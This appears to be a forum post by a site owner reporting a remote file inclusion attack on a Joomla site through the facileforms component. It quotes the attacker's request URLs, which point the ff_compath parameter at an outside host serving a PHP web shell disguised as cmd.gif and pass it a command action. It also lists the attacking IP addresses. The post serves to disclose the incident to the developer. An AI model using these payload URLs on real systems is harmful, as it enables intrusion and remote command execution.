I was hit by a remote query,
it was run by
www.myspace.siand the file was called cmd.gif
so the query was at
www.myspace.si/cmd.gifof course the cmd.gif was actually a php file like with a false extension.
Below i m putting the query and i attach the file (the correct extension is .php) that
someone tried to launch.
He entered my place with this query
http://www.mysite.com/component/option,com_facileforms/Itemid,96/components/com_facileforms/facileforms.frame.php?ff_compath=http://myspace.si/imagesthen he executed this
http://www.mysite.com/index.php?option=com_facileforms&Itemid=96http://www.myspace.si/images/cmd.gif?&action=cmd&chdir=/home/kite/public_html/and left from the same
http://www.mysite.com/index.php?option=com_facileforms&Itemid=96http://www.myspace.si/images/cmd.gif?&action=cmd&chdir=/home/kite/public_html/As far as i searched i didnt find any mulfunctions.
I think the creator must check this out
(just rename cmd.gif to cmf.php)
PS: i was attacked by the following ip's and countries
- Toscana, Arezzo, Italy ip-44-61.sn2.eutelia.it (83.211.44.61)
- Minas Gerais, Belo Horizonte, Brazil (201.50.144.64)
- Brazil aowen.persistelecom.com.br (200.189.60.253)
- Pernambuco, Recife, Brazil dial-up-200-157-27-28.intelignet.com.br (200.157.27.28)
- Noord-holland, Amsterdam, Netherlands (62.162.241.28)
